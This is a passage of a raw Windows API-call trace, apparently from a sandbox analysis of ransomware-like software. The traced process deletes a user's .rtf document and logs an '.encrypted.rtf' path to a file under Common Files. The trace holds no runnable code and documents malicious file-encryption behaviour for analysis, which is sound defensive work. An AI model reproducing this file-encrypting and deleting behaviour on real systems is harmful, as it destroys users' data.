hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.589] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0034.589] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.589] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.589] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.589] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.589] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.589] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.589] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.589] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf", lpFilePart=0x0) returned 0x71 [0034.589] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ed46980, ftCreationTime.dwHighDateTime=0x1d5c51a, ftLastAccessTime.dwLowDateTime=0xcdb1bcd0, ftLastAccessTime.dwHighDateTime=0x1d5b728, ftLastWriteTime.dwLowDateTime=0x147f8700, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x9fdd, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="6yMffX90.rtf", cAlternateFileName="")) returned 0x7c2100 [0034.589] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\hdwgqzq\\shrw\\6ymffx90.rtf")) returned 1 [0034.591] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ed46980, ftCreationTime.dwHighDateTime=0x1d5c51a, ftLastAccessTime.dwLowDateTime=0xcdb1bcd0, ftLastAccessTime.dwHighDateTime=0x1d5b728, ftLastWriteTime.dwLowDateTime=0x147f8700, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x9fdd, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="6yMffX90.rtf", cAlternateFileName="")) returned 0 [0034.592] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0034.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x791190 | out: hHeap=0x770000) returned 1 [0034.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0034.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0034.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0034.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0034.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0034.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0034.592] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0034.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0034.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0034.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0034.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0034.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0034.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0034.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0034.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0034.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0034.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0034.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0034.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0034.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0034.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0034.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0034.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0034.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0034.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0034.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0034.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0034.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0034.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0034.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0034.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0034.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0034.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0034.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0034.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0034.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0034.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0034.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0034.593] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.593] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0034.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0034.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0034.593] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0034.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0034.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0034.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0034.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0034.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0034.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0034.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0034.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.593] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.594] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.594] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.594] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.594] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0034.594] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0034.594] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0034.594] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0034.594] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0034.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0034.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0034.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0034.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0034.594] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0034.594] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x1623, lpOverlapped=0x0) returned 1 [0034.595] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0034.595] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x1623, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0034.595] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0034.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0034.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0034.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0034.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.encrypted.rtf\r\n", cchWideChar=126, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 126 [0034.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7e) returned 0x7d5c40 [0034.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.encrypted.rtf\r\n", cchWideChar=126, lpMultiByteStr=0x7d5c40, cbMultiByte=126, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.encrypted.rtf\r\n", lpUsedDefaultChar=0x0) returned 126 [0034.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0034.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0034.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0034.595] WriteFile (in: hFile=0x140, lpBuffer=0x7d5b30*, nNumberOfBytesToWrite=0x7d, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7d5b30*, lpNumberOfBytesWritten=0x6aee3c*=0x7d, lpOverlapped=0x0) returned 1 [0034.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0034.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.595] CloseHandle (hObject=0x140) returned 1 [0034.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0034.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0034.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0034.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0034.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0034.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0034.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0034.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c95d0 | out: hHeap=0x770000) returned 1 [0034.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0034.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0034.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0034.596] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0034.596] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0034.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0034.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0034.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0034.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0034.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0034.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0034.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0034.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0034.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0034.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0034.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0034.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0034.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0034.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0034.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0034.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0034.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0034.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0034.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0034.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0034.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0034.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0034.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0034.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0034.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0034.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0034.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0034.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0034.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0034.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0034.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0034.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0034.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0034.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0034.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0034.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0034.597] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0034.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0034.597] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0034.598] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0034.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0034.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0034.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0034.598] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0034.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0034.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0034.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0034.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5a8 [0034.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0034.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0034.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0034.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0034.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0034.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0034.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0034.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8891d8 [0034.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0034.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0034.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0034.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0034.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0034.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0034.598] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0034.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0034.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0034.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0034.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0034.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0034.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0034.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0034.599] RtlAllocateHeap (HeapHandle=0x770000, 